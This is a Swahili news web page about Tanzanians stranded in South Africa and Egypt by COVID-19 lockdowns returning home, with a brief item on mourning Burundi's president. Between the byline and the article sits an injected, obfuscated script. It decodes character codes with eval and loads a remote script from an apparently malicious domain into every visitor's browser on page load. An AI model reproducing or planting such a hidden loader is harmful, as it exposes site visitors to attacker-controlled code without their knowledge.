Recent Comments

WATANZANIA WALIOKWAMA AFRIKA KUSINI: Hatimaye warejea nyumbani

By ObyMack David Jun 14, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>


Watanzania 57 waliokuwa wamekwama nchini Afrika Kusini baada ya nchi hiyo kufunga mipaka yake kutokana na janga la virusi vya corona vinavyosababisha ugonjwa wa COVID 19 hatimae wamerejea nyumbani kupitia uwanja wa ndege wa Oliver Tambo nchini humo. –

Watanzania hao walikwama kwa takribani miezi mitatu baada ya uwepo wa zuio la kutoka nje (lockdown) na tayari wameondoka nchini humo kwa kutumia Shirika la ndege la Precission air kutokana na uratibu wa Wizara ya Mambo ya Nje na ushirikiano wa Afrika Mashariki kwa kuhusisha Ubalozi wa Tanzania Nchini humo. –

Akizungumza kwa furaha katika uwanja wa ndege wa Oliver Tambo uliopo Afrika Kusini Mtanzania anayefahamika kwa jina la Sunderland the only one ameishukuru Serikali kupitia kwa Balozi wa Tanzania nchini humo Meja Jenerali Mstaafu Gaudence Milanzi kwa kuwa pamoja nao katika kipindi chote ambacho wamekuwa katika zuio Afrika Kusini. –

Kundi jingine kama hilo la watanzania 38 waliokuwa wamekwama Nchini Misri nao wamefanikiwa kuondoka nchini humo kwa shirika la ndege la fly Egypt. –

Katika upande mwingine Naibu Waziri wa Mambo ya nje na Ushirikiano wa Afrika Mashariki Dkt. Damas Ndumbaro amesaini kitabu cha Maombolezo katika Ubalozi wa Burundi nchini Tanzania kufuatia msiba wa Rais wa Taifa hilo Pierre Nkurunziza kilichotokea Juni tisa mwaka huu kwa mshituko wa moyo. –

Juni 12 Rais Dkt. John Magufuli alitangaza Tanzania kupeperusha bendera ya Taifa nusu mlingoti na kuomboleza kwa siku tatu kifo cha rais huyo wa Burundi. –
Taarifa ya Michael Noel